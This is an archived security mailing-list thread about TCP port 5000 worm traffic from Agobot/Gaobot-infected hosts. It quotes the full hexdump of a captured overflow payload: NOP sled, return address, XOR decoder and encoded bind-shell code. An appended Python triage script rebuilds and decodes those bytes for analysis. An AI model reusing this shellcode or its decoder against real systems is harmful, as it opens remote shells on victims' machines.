Security Incidents mailing list archives

Re: TCP port 5000 syn increasing


From: Mike Barushok <barushok () keycreations com>
Date: Mon, 17 May 2004 17:14:40 -0500 (CDT)


Exactly identical to the capture posted at:
 http://www.linklogger.com/TCP5000_Overflow.htm

(That page has the title 'SQL Slammer Capture'.)

On Mon, 17 May 2004, Noel Cuillandre wrote:

It's a buffer overflow attack on the plug and play service on TCP port 5000.
The hexdump corresponds to an SQL Slammer-like worm.

Noel Cuillandre

Paul Schmehl wrote:

----- Original Message ----- 
From: "ANDREW STREULE" <brother_wolf () btopenworld com>
To: <incidents () securityfocus com>
Sent: Monday, May 17, 2004 2:24 PM
Subject: Re: TCP port 5000 syn increasing



on my honeypot a port 5000 event is almost always
followed by 1 or 2 nbt smb events.


Here's a hexdump of what I'm seeing on 5000.  The ones I'm seeing are coming
from boxes infected with Agobot/Gaobot and not just 81.x.x.x.

00000000  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
00000010  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
00000020  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
00000030  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
00000040  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
00000050  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
00000060  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
00000070  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
00000080  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
00000090  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
000000A0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
000000B0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
000000C0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
000000D0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
000000E0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
000000F0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
00000100  90 90 90 90 90 90 90 90 90 90 90 90 4D 3F E3 77  ............M?.w
00000110  90 90 90 90 FF 63 64 90 90 90 90 90 90 90 90 90  .....cd.........
00000120  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
00000130  90 90 90 90 90 90 90 90 EB 10 5A 4A 33 C9 66 B9  ..........ZJ3.f.
00000140  66 01 80 34 0A 99 E2 FA EB 05 E8 EB FF FF FF 70  f..4...........p
00000150  99 98 99 99 C3 21 95 69 64 E6 12 99 12 E9 85 34  .....!.id......4
00000160  12 D9 91 12 41 12 EA A5 9A 6A 12 EF E1 9A 6A 12  ....A....j....j.
00000170  E7 B9 9A 62 12 D7 8D AA 74 CF CE C8 12 A6 9A 62  ...b....t......b
00000180  12 6B F3 97 C0 6A 3F ED 91 C0 C6 1A 5E 9D DC 7B  .k...j?.....^..{
00000190  70 C0 C6 C7 12 54 12 DF BD 9A 5A 48 78 9A 58 AA  p....T....ZHx.X.
000001A0  50 FF 12 91 12 DF 85 9A 5A 58 78 9B 9A 58 12 99  P.......ZXx..X..
000001B0  9A 5A 12 63 12 6E 1A 5F 97 12 49 F3 9A C0 71 E5  .Z.c.n._..I...q.
000001C0  99 99 99 1A 5F 94 CB CF 66 CE 65 C3 12 41 F3 9D  ...._...f.e..A..
000001D0  C0 71 F0 99 99 99 C9 C9 C9 C9 F3 98 F3 9B 66 CE  .q............f.
000001E0  69 12 41 5E 9E 9B 99 9E 24 AA 59 10 DE 9D F3 89  i.A^....$.Y.....
000001F0  CE CA 66 CE 6D F3 98 CA 66 CE 61 C9 C9 CA 66 CE  ..f.m...f.a...f.
00000200  65 1A 75 DD 12 6D AA 42 F3 89 C0 10 85 17 7B 62  e.u..m.B......{b
00000210  10 DF A1 10 DF A5 10 DF D9 5E DF B5 98 98 99 99  .........^......
00000220  14 DE 89 C9 CF CA CA CA F3 98 CA CA 5E DE A5 FA  ............^...
00000230  F4 FD 99 14 DE A5 C9 CA 66 CE 7D C9 66 CE 71 AA  ........f.}.f.q.
00000240  59 35 1C 59 EC 60 C8 CB CF CA 66 4B C3 C0 32 7B  Y5.Y.`....fK..2{
00000250  77 AA 59 5A 71 62 67 66 66 DE FC ED C9 EB F6 FA  w.YZqbgff.......
00000260  D8 FD FD EB FC EA EA 99 DA EB FC F8 ED FC C9 EB  ................
00000270  F6 FA FC EA EA D8 99 DC E1 F0 ED C9 EB F6 FA FC  ................
00000280  EA EA 99 D5 F6 F8 FD D5 F0 FB EB F8 EB E0 D8 99  ................
00000290  EE EA AB C6 AA AB 99 CE CA D8 CA F6 FA F2 FC ED  ................
000002A0  D8 99 FB F0 F7 FD 99 F5 F0 EA ED FC F7 99 F8 FA  ................
000002B0  FA FC E9 ED 99 0D 0A 0D 0A                       .........

Paul Schmehl (pauls () utdallas edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/~pauls/




--

Mike Barushok
Senior Security Administrator
KeyCreations.com/KCISP.net/ispKansas.com
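Added example, written for this archive page and not code from any poster in the thread: a short Python triage of the hexdump Paul quoted. It rebuilds the 697-byte payload from the rows above, measures the NOP sled, lists the non-0x90 bytes buried in it, matches the decoder stub that starts at offset 0x138 (jmp / pop edx / dec edx / xor ecx,ecx / mov cx,0x166 / xor byte [edx+ecx],0x99 / loop / jmp / call), and XORs the 0x166 bytes after the call with the key the stub carries so the plaintext strings become readable. The function names and the shape of the triage() report are the editor's; the reading of the dword 0x77E33F4D in the sled as a probable return address into a system DLL is an inference, marked as such in the comments.

```python
"""Triage of the TCP/5000 payload quoted above (added example, not a poster's code).
Offsets 0x000-0x137 of the dump are 0x90 apart from two short runs at 0x10C and
0x114, so that prefix is built arithmetically; 0x138-0x2B8 are copied row by row."""
import re

# Offsets 0x000..0x137: NOP sled with two non-NOP runs embedded in it.
# 4D 3F E3 77 read little-endian is 0x77E33F4D; the 0x77xxxxxx range is where
# NT-era Windows system DLLs load, so a return address is the likely reading
# (editor's inference, not something the thread states).
SLED = (b"\x90" * 0x10C + bytes.fromhex("4D3FE377")
        + b"\x90" * 4 + bytes.fromhex("FF6364") + b"\x90" * 0x21)

# Offsets 0x138..0x2B8, copied from the hexdump rows in the message.
TAIL_ROWS = [
    "EB 10 5A 4A 33 C9 66 B9",
    "66 01 80 34 0A 99 E2 FA EB 05 E8 EB FF FF FF 70",
    "99 98 99 99 C3 21 95 69 64 E6 12 99 12 E9 85 34",
    "12 D9 91 12 41 12 EA A5 9A 6A 12 EF E1 9A 6A 12",
    "E7 B9 9A 62 12 D7 8D AA 74 CF CE C8 12 A6 9A 62",
    "12 6B F3 97 C0 6A 3F ED 91 C0 C6 1A 5E 9D DC 7B",
    "70 C0 C6 C7 12 54 12 DF BD 9A 5A 48 78 9A 58 AA",
    "50 FF 12 91 12 DF 85 9A 5A 58 78 9B 9A 58 12 99",
    "9A 5A 12 63 12 6E 1A 5F 97 12 49 F3 9A C0 71 E5",
    "99 99 99 1A 5F 94 CB CF 66 CE 65 C3 12 41 F3 9D",
    "C0 71 F0 99 99 99 C9 C9 C9 C9 F3 98 F3 9B 66 CE",
    "69 12 41 5E 9E 9B 99 9E 24 AA 59 10 DE 9D F3 89",
    "CE CA 66 CE 6D F3 98 CA 66 CE 61 C9 C9 CA 66 CE",
    "65 1A 75 DD 12 6D AA 42 F3 89 C0 10 85 17 7B 62",
    "10 DF A1 10 DF A5 10 DF D9 5E DF B5 98 98 99 99",
    "14 DE 89 C9 CF CA CA CA F3 98 CA CA 5E DE A5 FA",
    "F4 FD 99 14 DE A5 C9 CA 66 CE 7D C9 66 CE 71 AA",
    "59 35 1C 59 EC 60 C8 CB CF CA 66 4B C3 C0 32 7B",
    "77 AA 59 5A 71 62 67 66 66 DE FC ED C9 EB F6 FA",
    "D8 FD FD EB FC EA EA 99 DA EB FC F8 ED FC C9 EB",
    "F6 FA FC EA EA D8 99 DC E1 F0 ED C9 EB F6 FA FC",
    "EA EA 99 D5 F6 F8 FD D5 F0 FB EB F8 EB E0 D8 99",
    "EE EA AB C6 AA AB 99 CE CA D8 CA F6 FA F2 FC ED",
    "D8 99 FB F0 F7 FD 99 F5 F0 EA ED FC F7 99 F8 FA",
    "FA FC E9 ED 99 0D 0A 0D 0A",
]
PAYLOAD = SLED + bytes.fromhex(" ".join(TAIL_ROWS))


def longest_nop_sled(data):
    """(offset, length) of the longest run of 0x90 bytes in data."""
    runs = [(m.start(), m.end() - m.start()) for m in re.finditer(rb"\x90+", data)]
    return max(runs, key=lambda r: r[1]) if runs else (0, 0)


def sled_anomalies(data, end):
    """Non-0x90 runs in data[:end], i.e. values hidden inside the sled."""
    return [(m.start(), m.group()) for m in re.finditer(rb"[^\x90]+", data[:end])]


# The decoder stub at 0x138 in the dump, disassembled (32-bit x86):
#   EB 10           jmp  short +0x10   ; to the call
#   5A              pop  edx           ; edx = address of the byte after the call
#   4A              dec  edx
#   33 C9           xor  ecx, ecx
#   66 B9 LL HH     mov  cx, 0xHHLL    ; number of encoded bytes
#   80 34 0A KK     xor  byte [edx+ecx], KK
#   E2 FA           loop               ; back to the xor
#   EB 05           jmp  short +5      ; into the decoded bytes
#   E8 EB FF FF FF  call -0x15         ; back to pop edx
DECODER_RE = re.compile(
    rb"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9(..)\x80\x34\x0A(.)\xE2\xFA\xEB\x05\xE8",
    re.DOTALL)


def find_xor_decoder(data):
    """Return (stub_offset, payload_start, length, key), or None if no stub."""
    m = DECODER_RE.search(data)
    if m is None:
        return None
    length = int.from_bytes(m.group(1), "little")
    # [edx+ecx] for ecx = length..1 covers exactly the bytes after the call's rel32.
    return m.start(), m.end() + 4, length, m.group(2)[0]


def xor_decode(data, start, length, key):
    return bytes(b ^ key for b in data[start:start + length])


def printable_strings(blob, min_len=4):
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def triage(data):
    """First-pass report: sled size, bytes hidden in it, decoder, decoded strings."""
    sled_off, sled_len = longest_nop_sled(data)
    report = {"length": len(data), "sled_offset": sled_off, "sled_length": sled_len,
              "sled_anomalies": [], "decoder": None, "strings": []}
    found = find_xor_decoder(data)
    if found is not None:
        stub, start, length, key = found
        report["sled_anomalies"] = sled_anomalies(data, stub)
        report["decoder"] = {"stub_offset": stub, "payload_start": start,
                             "length": length, "key": key}
        report["strings"] = printable_strings(xor_decode(data, start, length, key))
    return report


if __name__ == "__main__":
    print(triage(PAYLOAD))
```

On the quoted bytes triage() reports a 268-byte sled at offset 0, the runs 4D 3F E3 77 at 0x10C and FF 63 64 at 0x114, the stub at 0x138 with length 0x166 and key 0x99, and among the decoded strings GetProcAddress, CreateProcessA, ExitProcess, LoadLibraryA, ws2_32, WSASocketA, bind, listen and accept, which is the import list of a bind shell. The trailing 0D 0A 0D 0A sits outside the encoded range and is sent in the clear. That is what the bytes contain; which service or flaw they were aimed at is not something the dump on its own settles.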
